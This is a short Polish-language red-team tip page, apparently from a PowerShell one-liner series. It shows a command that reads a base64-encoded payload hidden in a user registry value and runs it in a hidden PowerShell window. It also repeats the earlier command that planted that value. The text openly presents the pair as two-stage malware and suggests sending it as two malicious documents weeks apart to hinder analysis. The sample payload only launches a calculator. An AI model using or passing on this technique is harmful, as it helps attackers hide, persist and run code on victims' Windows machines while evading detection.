alphasec
PowerShell protip 0053
in 𝕏

powershell -w h -enc (gp HKCU:\Software\Microsoft\Windows).Signature - uruchom payload ukryty wcześniej w rejestrze, zakodowany w base64

tty1 · powershell
PS> powershell -w h -enc (gp HKCU:\Software\Microsoft\Windows).Signature
#Powershell#RedTeam#Backdoor#Rejestr#Windows

W /pl/0052 ukryliśmy w rejestrze payload zakodowany w base64, dla przypomnienia:

sp HKCU:\SOFTWARE\Microsoft\Windows Signature "YwBhAGwAYwA="

W tym protipie wykorzystujemy gp (alias na Get-ItemProperty), by pobrać tę wartość, którą przekazujemy do argumentu -enc Powershella, który zdekoduje sobie to polecenie, a następnie uruchomi. Dodatkowo podajemy argument -w h, co spowoduje, że okno z Powershellem zostanie ukryte (w pełnej formie wyglądałoby to -window hidden).

W pewnym sensie wykorzystujęc te dwa protipy stworzyliśmy dwuskładnikowy malware - pierwszy etap polega na przygotowaniu odpowiedniego klucza w rejestrze, natomiast drugi etap zadziała tylko wtedy, kiedy pierwszy się powiódł. Możemy zatem oba etapy rozłożyć w czasie (np. wysyłając 2 złośliwe dokumenty w dwutygodniowym odstępie), co może utrudnić analizę. 😈

← poprzedni protip 0052 ••• Wszystkie protipy następny → protip 0054
// subskrybuj

Nowe protipy prosto na maila.

Mięsiste jednolinijkowce i triki z prawdziwych zleceń. Zero spamu, zero teorii. Wypisujesz się jednym kliknięciem.

wersja newslettera: